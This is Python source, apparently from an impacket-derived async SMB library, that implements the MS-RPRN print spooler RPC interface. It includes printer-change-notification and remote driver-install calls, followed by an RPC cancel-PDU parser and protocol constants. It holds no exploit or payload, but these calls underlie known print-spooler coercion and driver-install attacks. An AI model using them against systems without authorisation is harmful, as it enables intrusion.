# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author: Alberto Solino (@agsolino)
#
# Description:
#   [MS-RPRN] Interface implementation
#
#   Best way to learn how to use these calls is to grab the protocol standard
#   so you understand what the call does, and then read the test case located
#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
#
#   Some calls have helper functions, which makes it even easier to use.
#   They are located at the end of this file. 
#   Helper functions start with "h"<name of the call>.
#   There are test cases for them too. 
#

import io
from os import stat

from aiosmb.dcerpc.v5.dtypes import ULONGLONG, UINT, USHORT, LPWSTR, DWORD, ULONG, NULL
from aiosmb.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRUNION, NDRPOINTER, NDRUniConformantArray
from aiosmb.dcerpc.v5.ndr import NDRVaryingString

from aiosmb.dcerpc.v5.rpcrt import DCERPCException
from aiosmb.dcerpc.v5 import system_errors
from aiosmb.dcerpc.v5.uuid import uuidtup_to_bin
from aiosmb.dcerpc.v5.structure import Structure

MSRPC_UUID_RPRN = uuidtup_to_bin(('12345678-1234-ABCD-EF00-0123456789AB', '1.0'))

class DCERPCSessionError(DCERPCException):
	def __init__(self, error_string=None, error_code=None, packet=None):
		DCERPCException.__init__(self, error_string, error_code, packet)

	def __str__( self ):
		key = self.error_code
		if key in system_errors.ERROR_MESSAGES:
			error_msg_short = system_errors.ERROR_MESSAGES[key][0]
			error_msg_verbose = system_errors.ERROR_MESSAGES[key][1] 
			return 'RPRN SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
		else:
			return 'RPRN SessionError: unknown error code: 0x%x' % self.error_code

################################################################################
# CONSTANTS
################################################################################
# 2.2.1.1.7 STRING_HANDLE
STRING_HANDLE = LPWSTR
class PSTRING_HANDLE(NDRPOINTER):
	referent = (
		('Data', STRING_HANDLE),
	)

# 2.2.3.1 Access Values
JOB_ACCESS_ADMINISTER         = 0x00000010
JOB_ACCESS_READ               = 0x00000020
JOB_EXECUTE                   = 0x00020010
JOB_READ                      = 0x00020020
JOB_WRITE                     = 0x00020010
JOB_ALL_ACCESS                = 0x000F0030
PRINTER_ACCESS_ADMINISTER     = 0x00000004
PRINTER_ACCESS_USE            = 0x00000008
PRINTER_ACCESS_MANAGE_LIMITED = 0x00000040
PRINTER_ALL_ACCESS            = 0x000F000C
PRINTER_EXECUTE               = 0x00020008
PRINTER_READ                  = 0x00020008
PRINTER_WRITE                 = 0x00020008
SERVER_ACCESS_ADMINISTER      = 0x00000001
SERVER_ACCESS_ENUMERATE       = 0x00000002
SERVER_ALL_ACCESS             = 0x000F0003
SERVER_EXECUTE                = 0x00020002
SERVER_READ                   = 0x00020002
SERVER_WRITE                  = 0x00020003
SPECIFIC_RIGHTS_ALL           = 0x0000FFFF
STANDARD_RIGHTS_ALL           = 0x001F0000
STANDARD_RIGHTS_EXECUTE       = 0x00020000
STANDARD_RIGHTS_READ          = 0x00020000
STANDARD_RIGHTS_REQUIRED      = 0x000F0000
STANDARD_RIGHTS_WRITE         = 0x00020000
SYNCHRONIZE                   = 0x00100000
DELETE                        = 0x00010000
READ_CONTROL                  = 0x00020000
WRITE_DAC                     = 0x00040000
WRITE_OWNER                   = 0x00080000
GENERIC_READ                  = 0x80000000
GENERIC_WRITE                 = 0x40000000
GENERIC_EXECUTE               = 0x20000000
GENERIC_ALL                   = 0x10000000

# 2.2.3.6.1 Printer Change Flags for Use with a Printer Handle
PRINTER_CHANGE_SET_PRINTER        = 0x00000002
PRINTER_CHANGE_DELETE_PRINTER     = 0x00000004
PRINTER_CHANGE_PRINTER            = 0x000000FF
PRINTER_CHANGE_ADD_JOB            = 0x00000100
PRINTER_CHANGE_SET_JOB            = 0x00000200
PRINTER_CHANGE_DELETE_JOB         = 0x00000400
PRINTER_CHANGE_WRITE_JOB          = 0x00000800
PRINTER_CHANGE_JOB                = 0x0000FF00
PRINTER_CHANGE_SET_PRINTER_DRIVER = 0x20000000
PRINTER_CHANGE_TIMEOUT            = 0x80000000
PRINTER_CHANGE_ALL                = 0x7777FFFF
PRINTER_CHANGE_ALL_2              = 0x7F77FFFF

# 2.2.3.6.2 Printer Change Flags for Use with a Server Handle
PRINTER_CHANGE_ADD_PRINTER_DRIVER        = 0x10000000
PRINTER_CHANGE_DELETE_PRINTER_DRIVER     = 0x40000000
PRINTER_CHANGE_PRINTER_DRIVER            = 0x70000000
PRINTER_CHANGE_ADD_FORM                  = 0x00010000
PRINTER_CHANGE_DELETE_FORM               = 0x00040000
PRINTER_CHANGE_SET_FORM                  = 0x00020000
PRINTER_CHANGE_FORM                      = 0x00070000
PRINTER_CHANGE_ADD_PORT                  = 0x00100000
PRINTER_CHANGE_CONFIGURE_PORT            = 0x00200000
PRINTER_CHANGE_DELETE_PORT               = 0x00400000
PRINTER_CHANGE_PORT                      = 0x00700000
PRINTER_CHANGE_ADD_PRINT_PROCESSOR       = 0x01000000
PRINTER_CHANGE_DELETE_PRINT_PROCESSOR    = 0x04000000
PRINTER_CHANGE_PRINT_PROCESSOR           = 0x07000000
PRINTER_CHANGE_ADD_PRINTER               = 0x00000001
PRINTER_CHANGE_FAILED_CONNECTION_PRINTER = 0x00000008
PRINTER_CHANGE_SERVER                    = 0x08000000

# 2.2.3.7 Printer Enumeration Flags
PRINTER_ENUM_LOCAL       = 0x00000002
PRINTER_ENUM_CONNECTIONS = 0x00000004
PRINTER_ENUM_NAME        = 0x00000008
PRINTER_ENUM_REMOTE      = 0x00000010
PRINTER_ENUM_SHARED      = 0x00000020
PRINTER_ENUM_NETWORK     = 0x00000040
PRINTER_ENUM_EXPAND      = 0x00004000
PRINTER_ENUM_CONTAINER   = 0x00008000
PRINTER_ENUM_ICON1       = 0x00010000
PRINTER_ENUM_ICON2       = 0x00020000
PRINTER_ENUM_ICON3       = 0x00040000
PRINTER_ENUM_ICON8       = 0x00800000
PRINTER_ENUM_HIDE        = 0x01000000


# 2.2.3.8 Printer Notification Values
PRINTER_NOTIFY_CATEGORY_2D  = 0x00000000
PRINTER_NOTIFY_CATEGORY_ALL = 0x00010000
PRINTER_NOTIFY_CATEGORY_3D  = 0x00020000

# 3.1.4.4.8 RpcAddPrinterDriverEx Values
APD_STRICT_UPGRADE              = 0x00000001
APD_STRICT_DOWNGRADE            = 0x00000002
APD_COPY_ALL_FILES              = 0x00000004
APD_COPY_NEW_FILES              = 0x00000008
APD_COPY_FROM_DIRECTORY         = 0x00000010
APD_DONT_COPY_FILES_TO_CLUSTER  = 0x00001000
APD_COPY_TO_ALL_SPOOLERS        = 0x00002000
APD_INSTALL_WARNED_DRIVER       = 0x00008000
APD_RETURN_BLOCKING_STATUS_CODE = 0x00010000


################################################################################
# STRUCTURES
################################################################################
# 2.2.1.1.4 PRINTER_HANDLE
class PRINTER_HANDLE(NDRSTRUCT):
	structure =  (
		('Data','20s=b""'),
	)
	def getAlignment(self):
		if self._isNDR64 is True:
			return 8
		else:
			return 4

# 2.2.1.2.1 DEVMODE_CONTAINER
class BYTE_ARRAY(NDRUniConformantArray):
	item = 'c'

class PBYTE_ARRAY(NDRPOINTER):
	referent = (
		('Data', BYTE_ARRAY),
	)

class DEVMODE_CONTAINER(NDRSTRUCT):
	structure =  (
		('cbBuf',DWORD),
		('pDevMode',PBYTE_ARRAY),
	)

# 2.2.1.11.1 SPLCLIENT_INFO_1
class SPLCLIENT_INFO_1(NDRSTRUCT):
	structure =  (
		('dwSize',DWORD),
		('pMachineName',LPWSTR),
		('pUserName',LPWSTR),
		('dwBuildNum',DWORD),
		('dwMajorVersion',DWORD),
		('dwMinorVersion',DWORD),
		('wProcessorArchitecture',USHORT),
	)

class PSPLCLIENT_INFO_1(NDRPOINTER):
	referent = (
		('Data', SPLCLIENT_INFO_1),
	)

# 2.2.1.11.2 SPLCLIENT_INFO_2
class SPLCLIENT_INFO_2(NDRSTRUCT):
	structure =  (
		('notUsed',ULONGLONG),
	)

class PSPLCLIENT_INFO_2(NDRPOINTER):
	referent = (
		('Data', SPLCLIENT_INFO_2),
	)
# 2.2.1.11.3 SPLCLIENT_INFO_3
class SPLCLIENT_INFO_3(NDRSTRUCT):
	structure =  (
		('cbSize',UINT),
		('dwFlags',DWORD),
		('dwFlags',DWORD),
		('pMachineName',LPWSTR),
		('pUserName',LPWSTR),
		('dwBuildNum',DWORD),
		('dwMajorVersion',DWORD),
		('dwMinorVersion',DWORD),
		('wProcessorArchitecture',USHORT),
		('hSplPrinter',ULONGLONG),
	)

class PSPLCLIENT_INFO_3(NDRPOINTER):
	referent = (
		('Data', SPLCLIENT_INFO_3),
	)
# 2.2.1.2.14 SPLCLIENT_CONTAINER
class CLIENT_INFO_UNION(NDRUNION):
	commonHdr = (
		('tag', ULONG),
	)
	union = {
		1 : ('pClientInfo1', PSPLCLIENT_INFO_1),
		2 : ('pNotUsed1', PSPLCLIENT_INFO_2),
		3 : ('pNotUsed2', PSPLCLIENT_INFO_3),
	}

class SPLCLIENT_CONTAINER(NDRSTRUCT):
	structure =  (
		('Level',DWORD),
		('ClientInfo',CLIENT_INFO_UNION),
	)


# 2.2.1.13.2 RPC_V2_NOTIFY_OPTIONS_TYPE
class USHORT_ARRAY(NDRUniConformantArray):
	item = '<H'

class PUSHORT_ARRAY(NDRPOINTER):
	referent = (
		('Data', USHORT_ARRAY),
	)

class RPC_V2_NOTIFY_OPTIONS_TYPE(NDRSTRUCT):
	structure =  (
		('Type',USHORT),
		('Reserved0',USHORT),
		('Reserved1',DWORD),
		('Reserved2',DWORD),
		('Count',DWORD),
		('pFields',PUSHORT_ARRAY),
	)

class PRPC_V2_NOTIFY_OPTIONS_TYPE_ARRAY(NDRPOINTER):
	referent = (
		('Data', RPC_V2_NOTIFY_OPTIONS_TYPE),
	)

# 2.2.1.13.1 RPC_V2_NOTIFY_OPTIONS
class RPC_V2_NOTIFY_OPTIONS(NDRSTRUCT):
	structure =  (
		('Version',DWORD),
		('Reserved',DWORD),
		('Count',DWORD),
		('pTypes',PRPC_V2_NOTIFY_OPTIONS_TYPE_ARRAY),
	)

class PRPC_V2_NOTIFY_OPTIONS(NDRPOINTER):
	referent = (
		('Data', RPC_V2_NOTIFY_OPTIONS),
	)

# 2.2.1.5.1 DRIVER_INFO_1
class DRIVER_INFO_1(NDRSTRUCT):
	structure = (
		('pName', STRING_HANDLE ),
	)
class PDRIVER_INFO_1(NDRPOINTER):
	referent = (
		('Data', DRIVER_INFO_1),
	)

# 2.2.1.5.2 DRIVER_INFO_2
class DRIVER_INFO_2(NDRSTRUCT):
	structure = (
		('cVersion',DWORD),
		('pName', STRING_HANDLE),
		('pEnvironment', STRING_HANDLE),
		('pDriverPath', STRING_HANDLE),
		('pDataFile', STRING_HANDLE),
		('pConfigFile', STRING_HANDLE),
	)
class PDRIVER_INFO_2(NDRPOINTER):
	referent = (
		('Data', DRIVER_INFO_2),
	)

class DRIVER_INFO_UNION(NDRUNION):
	commonHdr = (
		('tag', ULONG),
	)
	union = {
		1 : ('pNotUsed', PDRIVER_INFO_1),
		2 : ('Level2', PDRIVER_INFO_2),
	}

class DRIVER_CONTAINER(NDRSTRUCT):
	structure =  (
		('Level', DWORD),
		('DriverInfo', DRIVER_INFO_UNION),
	)

################################################################################
# Structure defs
################################################################################
class DRIVER_INFO_2_ENTRY:
	def __init__(self):
		self.Name = None
		self.Environment = None
		self.DriverPath = None
		self.DataFile = None
		self.ConfigFile = None
	
	def __str__(self):
		t = "DRIVER_INFO_2_ENTRY\r\n"
		t += "Name       : %s\r\n" % self.Name
		t += "Environment: %s\r\n" % self.Environment
		t += "DriverPath : %s\r\n" % self.DriverPath
		t += "DataFile   : %s\r\n" % self.DataFile
		t += "ConfigFile : %s\r\n" % self.ConfigFile
		return t

class DRIVER_INFO_2_ARRAY:
	def __init__(self):
		self.fixed = []
		self.fixed_size = 24

		self.drivers = []

	@staticmethod
	def from_bytes(data, elementNo):
		return DRIVER_INFO_2_ARRAY.from_buffer(io.BytesIO(data), elementNo)
	
	@staticmethod
	def from_buffer(buff, elementNo):
		res = DRIVER_INFO_2_ARRAY()
		for _ in range(elementNo):
			res.fixed.append(DRIVER_INFO_2_FIXED.from_buffer(buff))
		
		
		for i, fixed in enumerate(res.fixed):
			res.drivers.append(fixed.read_data(buff, res.fixed_size*i))
		
		return res
	
	def __str__(self):
		t = "DRIVER_INFO_2_ARRAY\r\n"
		for x in self.fixed:
			t += "FIXED: %s\r\n" % x
			t += "DRIVER: %s\r\n" % x.driver
		return t

	
class DRIVER_INFO_2_FIXED:
	def __init__(self):
		self.cVersion = None
		self.NameOffset = None
		self.EnvironmentOffset = None
		self.DriverPathOffset = None
		self.DataFileOffset = None
		self.ConfigFileOffset = None

		self.driver = None

	@staticmethod
	def read_utf16le(buff):
		res = b''
		while True:
			res += buff.read(1)
			if res[-3:] == b'\x00\x00\x00':
				break
		return res[:-2].decode('utf-16-le')

	def read_data(self, buff, offset_delta):
		self.driver = DRIVER_INFO_2_ENTRY()
		buff.seek(self.ConfigFileOffset + offset_delta,0)
		self.driver.ConfigFile = DRIVER_INFO_2_FIXED.read_utf16le(buff)

		buff.seek(self.DataFileOffset + offset_delta,0)
		self.driver.DataFile = DRIVER_INFO_2_FIXED.read_utf16le(buff)

		buff.seek(self.DriverPathOffset + offset_delta,0)
		self.driver.DriverPath = DRIVER_INFO_2_FIXED.read_utf16le(buff)

		buff.seek(self.EnvironmentOffset + offset_delta,0)
		self.driver.Environment = DRIVER_INFO_2_FIXED.read_utf16le(buff)

		buff.seek(self.NameOffset + offset_delta,0)
		self.driver.Name = DRIVER_INFO_2_FIXED.read_utf16le(buff)

		return self.driver

	@staticmethod
	def from_bytes(data):
		return DRIVER_INFO_2_FIXED.from_buffer(io.BytesIO(data))
	
	@staticmethod
	def from_buffer(buff):
		res = DRIVER_INFO_2_FIXED()
		res.cVersion = int.from_bytes(buff.read(4), byteorder='little', signed=False)
		res.NameOffset = int.from_bytes(buff.read(4), byteorder='little', signed=False)
		res.EnvironmentOffset = int.from_bytes(buff.read(4), byteorder='little', signed=False)
		res.DriverPathOffset = int.from_bytes(buff.read(4), byteorder='little', signed=False)
		res.DataFileOffset = int.from_bytes(buff.read(4), byteorder='little', signed=False)
		res.ConfigFileOffset = int.from_bytes(buff.read(4), byteorder='little', signed=False)
		return res
			

	def __str__(self):
		t = "DRIVER_INFO_2_FIXED\r\n"
		t += "Version          : %s\r\n" % self.cVersion
		t += "NameOffset       : %s\r\n" % self.NameOffset
		t += "EnvironmentOffset: %s\r\n" % self.EnvironmentOffset
		t += "DriverPathOffset : %s\r\n" % self.DriverPathOffset
		t += "DataFileOffset   : %s\r\n" % self.DataFileOffset
		t += "ConfigFileOffset : %s\r\n" % self.ConfigFileOffset
		return t

################################################################################
# RPC CALLS
################################################################################
# 3.1.4.2.1 RpcEnumPrinters (Opnum 0)
class RpcEnumPrinters(NDRCALL):
	opnum = 0
	structure = (
	   ('Flags', DWORD),
	   ('Name', STRING_HANDLE),
	   ('Level', DWORD),
	   ('pPrinterEnum', PBYTE_ARRAY),
	   ('cbBuf', DWORD),
	)

class RpcEnumPrintersResponse(NDRCALL):
	structure = (
	   ('pPrinterEnum', PBYTE_ARRAY),
	   ('pcbNeeded', DWORD),
	   ('pcReturned', DWORD),
	   ('ErrorCode', ULONG),
	)
# 3.1.4.2.2 RpcOpenPrinter (Opnum 1)
class RpcOpenPrinter(NDRCALL):
	opnum = 1
	structure = (
	   ('pPrinterName', STRING_HANDLE),
	   ('pDatatype', LPWSTR),
	   ('pDevModeContainer', DEVMODE_CONTAINER),
	   ('AccessRequired', DWORD),
	)

class RpcOpenPrinterResponse(NDRCALL):
	structure = (
	   ('pHandle', PRINTER_HANDLE),
	   ('ErrorCode', ULONG),
	)

# 3.1.4.2.9 RpcClosePrinter (Opnum 29)
class RpcClosePrinter(NDRCALL):
	opnum = 29
	structure = (
	   ('phPrinter', PRINTER_HANDLE),
	)

class RpcClosePrinterResponse(NDRCALL):
	structure = (
	   ('phPrinter', PRINTER_HANDLE),
	   ('ErrorCode', ULONG),
	)

# 3.1.4.10.4 RpcRemoteFindFirstPrinterChangeNotificationEx (Opnum 65)
class RpcRemoteFindFirstPrinterChangeNotificationEx(NDRCALL):
	opnum = 65
	structure = (
	   ('hPrinter', PRINTER_HANDLE),
	   ('fdwFlags', DWORD),
	   ('fdwOptions', DWORD),
	   ('pszLocalMachine', LPWSTR),
	   ('dwPrinterLocal', DWORD),
	   ('pOptions', PRPC_V2_NOTIFY_OPTIONS),
	)

class RpcRemoteFindFirstPrinterChangeNotificationExResponse(NDRCALL):
	structure = (
	   ('ErrorCode', ULONG),
	)

# 3.1.4.2.14 RpcOpenPrinterEx (Opnum 69)
class RpcOpenPrinterEx(NDRCALL):
	opnum = 69
	structure = (
	   ('pPrinterName', STRING_HANDLE),
	   ('pDatatype', LPWSTR),
	   ('pDevModeContainer', DEVMODE_CONTAINER),
	   ('AccessRequired', DWORD),
	   ('pClientInfo', SPLCLIENT_CONTAINER),
	)

class RpcOpenPrinterExResponse(NDRCALL):
	structure = (
	   ('pHandle', PRINTER_HANDLE),
	   ('ErrorCode', ULONG),
	)

# 3.1.4.4.2 RpcEnumPrinterDrivers (Opnum 10)
class RpcEnumPrinterDrivers(NDRCALL):
	opnum = 10
	structure = (
	   ('pName', STRING_HANDLE),
	   ('pEnvironment', LPWSTR),
	   ('Level', DWORD),
	   ('pDrivers', PBYTE_ARRAY),
	   ('cbBuf', DWORD),
	)

class RpcEnumPrinterDriversResponse(NDRCALL):
	structure = (
	   ('pDrivers', PBYTE_ARRAY), # 
	   ('pcbNeeded', DWORD),
	   ('pcReturned', DWORD),
	   ('ErrorCode', ULONG),
	)

# 3.1.4.4.8 RpcAddPrinterDriverEx (Opnum 89)
class RpcAddPrinterDriverEx(NDRCALL):
	opnum = 89
	structure = (
	   ('pName', STRING_HANDLE),
	   ('pDriverContainer', DRIVER_CONTAINER),
	   ('dwFileCopyFlags', DWORD),
	)

class RpcAddPrinterDriverExResponse(NDRCALL):
	structure = (
	   ('ErrorCode', ULONG),
	)


################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
	0  : (RpcEnumPrinters, RpcEnumPrintersResponse),
	1  : (RpcOpenPrinter, RpcOpenPrinterResponse),
	10 : (RpcEnumPrinterDrivers, RpcEnumPrinterDriversResponse),
	29 : (RpcClosePrinter, RpcClosePrinterResponse),
	65 : (RpcRemoteFindFirstPrinterChangeNotificationEx, RpcRemoteFindFirstPrinterChangeNotificationExResponse),
	69 : (RpcOpenPrinterEx, RpcOpenPrinterExResponse),
}

################################################################################
# HELPER FUNCTIONS
################################################################################
def checkNullString(string):
	if string == NULL:
		return string

	if string[-1:] != '\x00':
		return string + '\x00'
	else:
		return string

async def hRpcOpenPrinter(dce, printerName, pDatatype = NULL, pDevModeContainer = NULL, accessRequired = SERVER_READ):
	"""
	RpcOpenPrinter retrieves a handle for a printer, port, port monitor, print job, or print server.
	Full Documentation: https://msdn.microsoft.com/en-us/library/cc244808.aspx

	:param DCERPC_v5 dce: a connected DCE instance.
	:param string printerName: A string for a printer connection, printer object, server object, job object, port
	object, or port monitor object. This MUST be a Domain Name System (DNS), NetBIOS, Internet Protocol version 4
	(IPv4), Internet Protocol version 6 (IPv6), or Universal Naming Convention (UNC) name that remote procedure
	call (RPC) binds to, and it MUST uniquely identify a print server on the network.
	:param string pDatatype: A string that specifies the data type to be associated with the printer handle.
	:param DEVMODE_CONTAINER pDevModeContainer: A DEVMODE_CONTAINER structure. This parameter MUST adhere to the specification in
	DEVMODE_CONTAINER Parameters (section 3.1.4.1.8.1).
	:param int accessRequired: The access level that the client requires for interacting with the object to which a
	handle is being opened.

	:return: a RpcOpenPrinterResponse instance, raises DCERPCSessionError on error.
	"""
	request = RpcOpenPrinter()
	request['pPrinterName'] = checkNullString(printerName)
	request['pDatatype'] = pDatatype
	if pDevModeContainer is NULL:
		request['pDevModeContainer']['pDevMode'] = NULL
	else:
		request['pDevModeContainer'] = pDevModeContainer

	request['AccessRequired'] = accessRequired
	return await dce.request(request)

async def hRpcClosePrinter(dce, phPrinter):
	"""
	RpcClosePrinter closes a handle to a printer object, server object, job object, or port object.
	Full Documentation: https://msdn.microsoft.com/en-us/library/cc244768.aspx

	:param DCERPC_v5 dce: a connected DCE instance.
	:param PRINTER_HANDLE phPrinter: A handle to a printer object, server object, job object, or port object.

	:return: a RpcClosePrinterResponse instance, raises DCERPCSessionError on error.
	"""
	request = RpcClosePrinter()
	request['phPrinter'] = phPrinter
	return await dce.request(request)


async def hRpcOpenPrinterEx(dce, printerName, pDatatype=NULL, pDevModeContainer=NULL, accessRequired=SERVER_READ,
					  pClientInfo=NULL):
	"""
	RpcOpenPrinterEx retrieves a handle for a printer, port, port monitor, print job, or print server
	Full Documentation: https://msdn.microsoft.com/en-us/library/cc244809.aspx

	:param DCERPC_v5 dce: a connected DCE instance.
	:param string printerName: A string for a printer connection, printer object, server object, job object, port
	object, or port monitor object. This MUST be a Domain Name System (DNS), NetBIOS, Internet Protocol version 4
	(IPv4), Internet Protocol version 6 (IPv6), or Universal Naming Convention (UNC) name that remote procedure
	call (RPC) binds to, and it MUST uniquely identify a print server on the network.
	:param string pDatatype: A string that specifies the data type to be associated with the printer handle.
	:param DEVMODE_CONTAINER pDevModeContainer: A DEVMODE_CONTAINER structure. This parameter MUST adhere to the specification in
	DEVMODE_CONTAINER Parameters (section 3.1.4.1.8.1).
	:param int accessRequired: The access level that the client requires for interacting with the object to which a
	handle is being opened.
	:param SPLCLIENT_CONTAINER pClientInfo: This parameter MUST adhere to the specification in SPLCLIENT_CONTAINER Parameters.

	:return: a RpcOpenPrinterExResponse instance, raises DCERPCSessionError on error.
	"""
	request = RpcOpenPrinterEx()
	request['pPrinterName'] = checkNullString(printerName)
	request['pDatatype'] = pDatatype
	if pDevModeContainer is NULL:
		request['pDevModeContainer']['pDevMode'] = NULL
	else:
		request['pDevModeContainer'] = pDevModeContainer

	request['AccessRequired'] = accessRequired
	if pClientInfo is NULL:
		raise Exception('pClientInfo cannot be NULL')

	request['pClientInfo'] = pClientInfo
	return await dce.request(request)


async def hRpcRemoteFindFirstPrinterChangeNotificationEx(dce, hPrinter, fdwFlags, fdwOptions=0, pszLocalMachine=NULL,
												   dwPrinterLocal=0, pOptions=NULL):
	"""
	creates a remote change notification object that monitors changes to printer objects and sends change notifications
	to a print client using either RpcRouterReplyPrinter (section 3.2.4.1.2) or RpcRouterReplyPrinterEx (section 3.2.4.1.4)
	Full Documentation: https://msdn.microsoft.com/en-us/library/cc244813.aspx

	:param DCERPC_v5 dce: a connected DCE instance.
	:param PRINTER_HANDLE hPrinter: A handle to a printer or server object.
	:param int fdwFlags: Flags that specify the conditions that are required for a change notification object to enter a signaled state.
	:param int fdwOptions: The category of printers for which change notifications are returned.
	:param string pszLocalMachine: A string that represents the name of the client computer.
	:param int dwPrinterLocal: An implementation-specific unique value that MUST be sufficient for the client to determine
	whether a call to RpcReplyOpenPrinter by the server is associated with the hPrinter parameter in this call.
	:param RPC_V2_NOTIFY_OPTIONS pOptions:  An RPC_V2_NOTIFY_OPTIONS structure that specifies printer or job members that the client listens to for notifications.

	:return: a RpcRemoteFindFirstPrinterChangeNotificationExResponse instance, raises DCERPCSessionError on error.
	"""
	request = RpcRemoteFindFirstPrinterChangeNotificationEx()

	request['hPrinter'] = hPrinter
	request['fdwFlags'] = fdwFlags
	request['fdwOptions'] = fdwOptions
	request['dwPrinterLocal'] = dwPrinterLocal
	if pszLocalMachine is NULL:
		raise Exception('pszLocalMachine cannot be NULL')
	request['pszLocalMachine'] = checkNullString(pszLocalMachine)
	request['pOptions'] = pOptions
	return await dce.request(request)

async def hRpcEnumPrinters(dce, flags, name = NULL, level = 1):
	"""
	RpcEnumPrinters enumerates available printers, print servers, domains, or print providers.
	Full Documentation: https://msdn.microsoft.com/en-us/library/cc244794.aspx

	:param DCERPC_v5 dce: a connected DCE instance.
	:param int flags: The types of print objects that this method enumerates. The value of this parameter is the
	result of a bitwise OR of one or more of the Printer Enumeration Flags (section 2.2.3.7).
	:param string name: NULL or a server name parameter as specified in Printer Server Name Parameters (section 3.1.4.1.4).
	:param level: The level of printer information structure.

	:return: a RpcEnumPrintersResponse instance, raises DCERPCSessionError on error.
	"""
	request = RpcEnumPrinters()
	request['Flags'] = flags
	request['Name'] = name
	request['pPrinterEnum'] = NULL
	request['Level'] = level
	bytesNeeded = 0
	try:
		dce.request(request)
	except DCERPCSessionError as e:
		if str(e).find('ERROR_INSUFFICIENT_BUFFER') < 0:
			raise
		bytesNeeded = e.get_packet()['pcbNeeded']

	request = RpcEnumPrinters()
	request['Flags'] = flags
	request['Name'] = name
	request['Level'] = level

	request['cbBuf'] = bytesNeeded
	request['pPrinterEnum'] = b'a' * bytesNeeded
	return await dce.request(request)

async def hRpcAddPrinterDriverEx(dce, pName, pDriverContainer, dwFileCopyFlags):
	"""
	RpcAddPrinterDriverEx installs a printer driver on the print server
	Full Documentation: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b

	:param DCERPC_v5 dce: a connected DCE instance.
	:param pName
	:param pDriverContainer
	:param dwFileCopyFlags

	:return: raises DCERPCSessionError on error.
	"""
	request = RpcAddPrinterDriverEx()
	request['pName'] = checkNullString(pName)
	request['pDriverContainer'] = pDriverContainer
	request['dwFileCopyFlags'] = dwFileCopyFlags

	#return request
	return await dce.request(request)


async def hRpcEnumPrinterDrivers(dce, pName, pEnvironment, Level):
	"""
	RpcEnumPrinterDrivers enumerates the printer drivers installed on a specified print server.
	Full Documentation: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/857d00ac-3682-4a0d-86ca-3d3c372e5e4a

	:param DCERPC_v5 dce: a connected DCE instance.
	:param pName
	:param pEnvironment
	:param Level
	:param pDrivers
	:param cbBuf
	:param pcbNeeded
	:param pcReturned

	:return: raises DCERPCSessionError on error.
	"""
	# get value for cbBuf
	request = RpcEnumPrinterDrivers()
	request['pName']        = checkNullString(pName)
	request['pEnvironment'] = pEnvironment
	request['Level']        = Level
	request['pDrivers']     = NULL
	request['cbBuf']        = 0
	try:
		_, err = await dce.request(request)
		if err is not None:
			raise err
	except DCERPCSessionError as e:
		if str(e).find('ERROR_INSUFFICIENT_BUFFER') < 0:
			raise
		bytesNeeded = e.get_packet()['pcbNeeded']
	except Exception as e:
		return None, e

	# now do RpcEnumPrinterDrivers again
	request = RpcEnumPrinterDrivers()
	request['pName']        = checkNullString(pName)
	request['pEnvironment'] = pEnvironment
	request['Level']        = Level
	request['pDrivers']     = b'a' * bytesNeeded
	request['cbBuf']        = bytesNeeded

	#return request
	data_raw, err = await dce.request(request)
	if err is not None:
		return None, err
	
	data = DRIVER_INFO_2_ARRAY.from_bytes(b''.join(data_raw['pDrivers']), data_raw['pcReturned'])
	return data.drivers, err



import io
import enum
from aiosmb.dcerpc.v5.protocol.con.constants import PTYPE, PFC

class CANCELPDU:
	def __init__(self) -> None:
		self.rpc_vers = 5
		self.rpc_vers_minor = 0
		self.PTYPE = PTYPE.CO_CANCEL
		self.pfc_flags = None
		self.packed_drep = None
		self.frag_length = None
		self.auth_length = None
		self.call_id = None
		self.auth_verifier = None #auth_verifier_co_t
	
	@staticmethod
	def from_bytes(data):
		return CANCELPDU.from_buffer(io.BytesIO(data))
	
	@staticmethod
	def from_buffer(buff):
		res = CANCELPDU()
		res.rpc_vers = int.from_bytes(buff.read(1), byteorder='little', signed=False)
		res.rpc_vers_minor = int.from_bytes(buff.read(1), byteorder='little', signed=False)
		res.PTYPE = PTYPE(int.from_bytes(buff.read(1), byteorder='little', signed=False))
		res.pfc_flags = PFC(int.from_bytes(buff.read(1), byteorder='little', signed=False))
		res.packed_drep = buff.read(4)
		res.frag_length = int.from_bytes(buff.read(2), byteorder='little', signed=False)
		res.auth_length = int.from_bytes(buff.read(2), byteorder='little', signed=False)
		res.call_id = int.from_bytes(buff.read(4), byteorder='little', signed=False)
		if res.auth_length > 0:
			res.auth_verifier = buff.read(res.auth_length)
		return res
	
	def __str__(self):
		t = 'CANCELPDU\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for entry, i in enumerate(self.__dict__[k]):
					print(entry)
					t += '%s : %s : %s\r\n' % (k, i, str(entry))
			else:
				t += '%s : %s\r\n' % (k, self.__dict__[k])
		return t



# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
#   Partial C706.pdf + [MS-RPCE] implementation
#
#   Best way to learn how to use these calls is to grab the protocol standard
#   so you understand what the call does, and then read the test case located
#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
#
# ToDo: 
# [ ] Take out all the security provider stuff out of here (e.g. RPC_C_AUTHN_WINNT)
#	 and put it elsewhere. This will make the coder cleaner and easier to add 
#	 more SSP (e.g. NETLOGON)
# 

from aiosmb.dcerpc.v5.structure import Structure
from aiosmb.dcerpc.v5.uuid import uuidtup_to_bin
from aiosmb.dcerpc.v5.dtypes import UCHAR, ULONG, USHORT
from aiosmb.dcerpc.v5.ndr import NDRSTRUCT


# MS/RPC Constants
MSRPC_REQUEST   = 0x00
MSRPC_PING	  = 0x01
MSRPC_RESPONSE  = 0x02
MSRPC_FAULT	 = 0x03
MSRPC_WORKING   = 0x04
MSRPC_NOCALL	= 0x05
MSRPC_REJECT	= 0x06
MSRPC_ACK	   = 0x07
MSRPC_CL_CANCEL = 0x08
MSRPC_FACK	  = 0x09
